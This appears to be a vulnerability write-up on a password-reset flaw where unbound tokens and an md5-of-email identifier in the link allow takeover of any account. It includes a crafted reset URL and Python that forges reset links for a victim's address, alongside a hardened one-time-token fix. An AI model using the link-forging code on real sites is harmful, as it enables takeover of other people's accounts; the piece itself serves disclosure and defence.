Using this vulnerability, an attacker can replace the email md5 hash in the reset link with the md5 hash of any victim's email and change that victim's password. The password reset link sent to the user contains the md5 hash of the email address, and the password reset token is not bound to the account that requested it, so one user's token can be reused for other users. In this way the attacker can reset the passwords of all accounts and fully compromise them.
The only precondition is that the attacker knows the md5 hash of the victim's email ID, and since that is just md5 of the email address, knowing the address is enough.
Attacker's Email ID: firstname.lastname@example.org, and his password reset link:
The first part of the password reset URL, before the '/', is the password reset token; the second part is the md5 hash of the user's email ID. In that second part the first 28 characters (74q55426l4q5u5m5c4s5l5m5n5t2) are the same for every user's email ID, and the remaining characters differ per user, because they are the md5 hash of that user's email ID. md5 is a hash, not encryption, so it cannot be "decrypted" in the strict sense, but the attacker already knows the victim's email address and can simply compute its md5, and for an unknown hash the online md5 lookup services such as http://md5decryption.com will often return the original value. Some websites use base64 (or other encodings) instead, which is not encryption at all and can be reversed with any online base64 encoder/decoder such as http://ostermiller.org/calc/encode.html.
Attacker's Email ID: email@example.com, md5 hash value:
First 28 characters, which are the same for every user's email ID hash:
Crafted URL to reset the password of the victim's email ID (i.e. account) firstname.lastname@example.org:
password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t205ebb8fb6ec39f50d33e19cd5719084d
In this way the attacker can take over any user's account.
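The link layout described above, as an added example that is not part of the original write-up: the shared 28-character prefix is the one quoted on this page, the host, the attacker's token and the email addresses are constructed placeholders, and it is assumed the site hashes the address exactly as entered. The first check a tester would run is whether the per-user part of the link is simply md5(email); if it is, a crafted link is built by keeping one's own valid token and swapping in the victim's digest.

```python
import hashlib
from urllib.parse import urlsplit, urlunsplit

# Constant prefix the write-up observed in the second path segment of every
# reset link; the 32 hex characters after it are md5(email).
SHARED_PREFIX = "74q55426l4q5u5m5c4s5l5m5n5t2"


def email_hash(email: str) -> str:
    """md5 hex digest of an e-mail address exactly as given (no normalisation
    assumed). md5 is a hash, not encryption, but anyone who knows the address
    can compute this value, so it carries no secret at all."""
    return hashlib.md5(email.encode("utf-8")).hexdigest()


def parse_reset_link(url: str):
    """Split a link of the shape .../password/<token>/<prefix><md5> into
    (token, prefix, email_md5). The path layout is taken from the write-up."""
    segments = urlsplit(url).path.rstrip("/").split("/")
    if len(segments) < 2:
        raise ValueError("reset link does not contain a token and an identifier")
    token, identifier = segments[-2], segments[-1]
    if len(identifier) < 32:
        raise ValueError("identifier segment too short to contain an md5 digest")
    return token, identifier[:-32], identifier[-32:]


def identifier_is_email_md5(url: str, email: str) -> bool:
    """Does the per-user part of the link equal md5(email)? If so, the
    identifier is predictable by anyone who knows the address."""
    _, _, digest = parse_reset_link(url)
    return digest == email_hash(email)


def craft_reset_link(own_link: str, victim_email: str) -> str:
    """Keep the attacker's own (valid but unbound) token and the shared prefix,
    and swap in md5(victim_email): the crafted URL from the write-up."""
    parts = urlsplit(own_link)
    token, prefix, _ = parse_reset_link(own_link)
    head = parts.path.rstrip("/").rsplit("/", 2)[0]   # everything before <token>
    new_path = f"{head}/{token}/{prefix}{email_hash(victim_email)}"
    return urlunsplit(parts._replace(path=new_path))


if __name__ == "__main__":
    # Constructed sample: the attacker's own link with a placeholder token.
    own = (f"https://target.example/password/ATTACKERS_OWN_TOKEN/"
           f"{SHARED_PREFIX}{email_hash('attacker@example.com')}")
    print(identifier_is_email_md5(own, "attacker@example.com"))
    print(craft_reset_link(own, "victim@example.com"))
```

`craft_reset_link` leaves the token segment untouched on purpose: the whole bug is that the server accepts any valid token for any account, so the attacker never needs a token belonging to the victim.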
Input from the user should be treated as untrusted and re-validated on the server. The recommended fix is to generate a one-time random token that is linked server-side to the user account, put that token in the link instead of the email ID hash, and expire it once the password has been reset (or after a short time). Additionally, ensure that if the identifier is not passed at all, the request does not default to updating all accounts.
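The flawed flow beside the recommended one, as an added example written for this page rather than code from the affected site: `vulnerable_reset` mirrors the bug (any existing token plus any md5(email) resets that account), while `PasswordResetService` issues a random one-time token bound server-side to the account, stores only a hash of it, expires it, and resolves the account from the token so the link carries no user identifier to tamper with. The fifteen-minute lifetime, the in-memory stores and the plain-text password store are assumptions for the demo.

```python
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumed lifetime of a reset link


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def vulnerable_reset(accounts, valid_tokens, token, email_md5, new_password):
    """The flawed flow from the write-up: the token only has to exist, it is
    not tied to an account, and the account is chosen by md5(email) taken
    straight from the URL, so the attacker's own token works for every user."""
    if token not in valid_tokens:
        return False
    for email, record in accounts.items():
        if md5_hex(email) == email_md5:
            record["password"] = new_password
            return True
    return False


class PasswordResetService:
    """Hardened flow: a random one-time token is bound server-side to the
    account. The link carries only the token; the account comes from the
    server's own record, so there is nothing in the URL to substitute."""

    def __init__(self, clock=time.time):
        self._pending = {}    # sha256(token) -> (user_id, expires_at)
        self.passwords = {}   # user_id -> new password (toy store for the demo)
        self._clock = clock   # injectable so expiry can be tested offline

    @staticmethod
    def _fingerprint(token: str) -> str:
        # Store only a hash of the token so a leaked table cannot be replayed.
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def issue_token(self, user_id: str) -> str:
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._pending[self._fingerprint(token)] = (user_id, self._clock() + TOKEN_TTL_SECONDS)
        return token

    def reset_link(self, user_id: str, base="https://example.test/password/reset") -> str:
        return f"{base}/{self.issue_token(user_id)}"

    def consume_token(self, token: str):
        """Return the bound user_id, or None. The record is removed on the first
        presentation, so a link cannot be replayed even within its lifetime."""
        record = self._pending.pop(self._fingerprint(token), None)
        if record is None:
            return None
        user_id, expires_at = record
        if self._clock() > expires_at:
            return None
        return user_id

    def reset_password(self, token: str, new_password: str) -> bool:
        user_id = self.consume_token(token)
        if user_id is None:
            return False
        # Real code would store a slow password hash (argon2/bcrypt); kept plain here.
        self.passwords[user_id] = new_password
        return True


if __name__ == "__main__":
    svc = PasswordResetService()
    link = svc.reset_link("victim")
    token = link.rsplit("/", 1)[1]
    print(link)
    print(svc.reset_password(token, "new-secret"))   # first use succeeds
    print(svc.reset_password(token, "again"))        # replay fails
```

Because the account is looked up from the token's server-side record, a request with no identifier at all simply fails closed; there is no code path that could fall back to "all accounts".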
So in this way one can take over victims' accounts through the password reset functionality, token and link, and the same approach can be used to find this type of vulnerability on other websites.
Suggestions and feedback are welcome.